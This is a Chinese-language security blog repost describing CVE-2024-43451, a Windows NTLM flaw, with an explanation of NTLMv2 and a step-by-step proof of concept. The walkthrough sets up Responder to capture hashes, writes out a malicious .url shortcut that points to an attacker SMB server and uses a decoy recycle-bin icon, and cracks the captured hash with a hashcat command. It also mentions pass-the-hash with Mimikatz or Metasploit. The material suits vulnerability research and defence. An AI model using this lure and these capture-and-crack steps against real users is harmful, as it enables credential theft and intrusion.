CVE-2024-43451 Windows NTLM 漏洞,允许攻击者使用恶意快捷方式强制身份验证并捕获 NTLM 哈希

admin 2025年1月26日23:33:51评论94 views字数 1492阅读4分58秒阅读模式

CVE-2024-43451 Windows NTLM 漏洞,允许攻击者使用恶意快捷方式强制身份验证并捕获 NTLM 哈希

描述

  • 名称:CVE-2024-43451

  • CVSSv3 评分:6.5

  • 受影响的版本:2024 年 11 月补丁之前的所有 Microsoft Windows 版本

CVE-2024-43451 是 Microsoft Windows 中的一个零日漏洞,攻击者可以利用该漏洞在与用户进行最少交互的情况下捕获 NTLMv2 密码哈希,从而可能导致凭据被盗。一种常用的利用方法是利用 SMB 连接上的 NTLM 身份验证来捕获远程服务器的哈希。此漏洞已在 2024 年 11 月的更新中得到修补。建议用户应用相关的安全更新以降低风险。

此次攻击被发现利用了一封从受感染的乌克兰政府服务器发送的网络钓鱼电子邮件。该电子邮件包含一个恶意 URL 文件。当用户通过右键单击、删除或移动文件与文件交互时,漏洞就会被激活。这会触发与攻击者服务器的连接,从而下载更多恶意文件,例如 SparkRAT 恶意软件(一种开源远程访问木马,允许攻击者控制受害者的系统)。

NTLM 身份验证

NTLMv2 是目前最安全且最具相关性的版本。

  • 客户端连接到服务器并请求访问资源。

  • 服务器生成一个随机数(一个随机的 16 字节质询)并将其发送给客户端。

  • 客户端发送使用 HMAC-MD5 算法生成的响应,其中包括密码哈希(使用 NT 哈希算法)、服务器随机数、时间戳、客户端随机数等。

  • 服务器使用 NT 哈希并重复相同的计算来生成自己的 NTLM 响应,一旦它们各自有了自己的响应,它们就可以对它们进行比较。

  • 一旦比较,服务器就会决定是否接受或拒绝连接。

CVE-2024-43451 Windows NTLM 漏洞,允许攻击者使用恶意快捷方式强制身份验证并捕获 NTLM 哈希

开发

POC 设置

为了为此 POC 创建工作环境,我们必须设置一个目标 Windows 机器,其版本号

在 2024 年 11 月之前发布,以及一个远程服务器来模拟捕获哈希:

1.下载并安装Responder以通过 SMB 捕获哈希:

brew install python3git clone https://github.com/lgandx/Responder.gitcd Respondersudo python3 Responder.py -I <put your network interface> -v

2.确保目标 Windows VM 与远程“黑客”环境之间成功连接。

3.通过进入资源管理器并输入以下内容来测试响应程序设置\(remote server IP):

CVE-2024-43451 Windows NTLM 漏洞,允许攻击者使用恶意快捷方式强制身份验证并捕获 NTLM 哈希

创建漏洞

由于所有漏洞利用都需要与远程服务器建立 SMB 连接,因此我们可以使用一个简单的文件来模拟它:

1.打开记事本

2.输入以下内容:

您可以输入任何可以诱使用户进行交互的图标,我使用了“已满垃圾桶”图标(32)

[InternetShortcut]
URL=\(remote server IP)share
IconIndex=32                    
IconFile=C:WindowsSystem32shell32.dll

3.将其保存为(名称).url

活动进程

一旦文件准备好并传送到目标系统,窃取哈希只需要很少的用户交互。此交互可能涉及以下任何操作:

  • 下载文件并访问“下载”文件夹

  • 右键单击文件

  • 将文件移动到另一个文件夹

Cracking

Mimikatz有了未加密的哈希值,我们可以尝试破解它以显示纯文本密码,或者使用或之类的工具在“传递哈希”攻击中使用它Metasploit。

在我们的例子中,一个简单的Hashcat命令就可以显示我的密码:hashcat -m 5600 leak.txt rockyou.txt

CVE-2024-43451 Windows NTLM 漏洞,允许攻击者使用恶意快捷方式强制身份验证并捕获 NTLM 哈希

  • https://github.com/RonF98/CVE-2024-43451-POC

原文始发于微信公众号(Ots安全):CVE-2024-43451 Windows NTLM 漏洞,允许攻击者使用恶意快捷方式强制身份验证并捕获 NTLM 哈希

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月26日23:33:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-43451 Windows NTLM 漏洞,允许攻击者使用恶意快捷方式强制身份验证并捕获 NTLM 哈希https://cn-sec.com/archives/3675574.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息